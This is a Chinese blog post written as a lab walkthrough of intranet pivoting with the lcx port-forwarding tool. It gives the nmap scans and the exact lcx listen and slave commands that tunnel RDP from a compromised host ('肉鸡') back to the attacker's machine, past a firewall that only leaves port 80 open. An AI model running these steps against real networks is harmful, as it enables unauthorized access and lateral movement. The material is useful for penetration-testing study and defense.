lcx内网端口转发

Lcx实现内网端口转发

lcx是一款端口转发工具,有三个功能,第一个功能将本地端口转发到远程主机某个端口上(前提需要公网ip);

第二个功能将本地端口转发到本地另一个端口上;第三个功能是进行监听并进行转发使用

 

案例:肉鸡1只开放了80端口,没有开放3389端口,我们将他的3389转发到自己的外网机的4444端口,然后连接上自己的外网机的4444之后,继续监听5555,

我们在内网的攻击机上通过访问5555端口,就可以连接到肉鸡1的远程桌面,进而访问肉鸡2

 

本机:192.168.17.123

中间主机(肉鸡1):网卡1:192.168.27.156  网卡2:192.168.17.110

肉鸡2:192.168.27.131

  问题:肉鸡防火墙都是开启状态,中间主机只有80端口开放,其他端口关闭,如何去登录被攻击主机?

 

下面我们来做实验:

使用nmap都扫描一下肉鸡,看有哪些端口开放,nmap 192.168.17.110  

                                                                             Nmap 192.168.27.131

在本机上我们尝试访问肉鸡1,    192.168.17.110

肉鸡1访问肉鸡2,     192.168.27.131

当然因为是同一网段,所以这些都是可以被访问到的,可是我们要做的是让本机访问肉鸡2啊,

不能直接使用远程桌面登录,那么就想办法让肉鸡主动发起连接(sockets 连接)

 

首先先在肉鸡1上,上传lcx.exe文件,然后在本机上执行

本机:lcx.exe -listen 4444 5555  本机监听4444端口  5555端口空闲

肉鸡1上执行操作:  lcx.exe -slave 192.168.17.123  4444 192.168.17.110 3389 (slave转发功能

之后在本机上cmd上就会出现正在连接端口

本机上开启远程桌面,正常来说,我们直接192.168.17.110:3389就可以实现远程控制肉鸡1,但是只开放了80端口啊,

所以我们由内到外发起的连接,127.0.0.1:5555

之后就成功登录肉鸡1,并且访问肉鸡2了

posted @ 2020-05-21 11:28  gxy*  阅读(332)  评论(0编辑  收藏  举报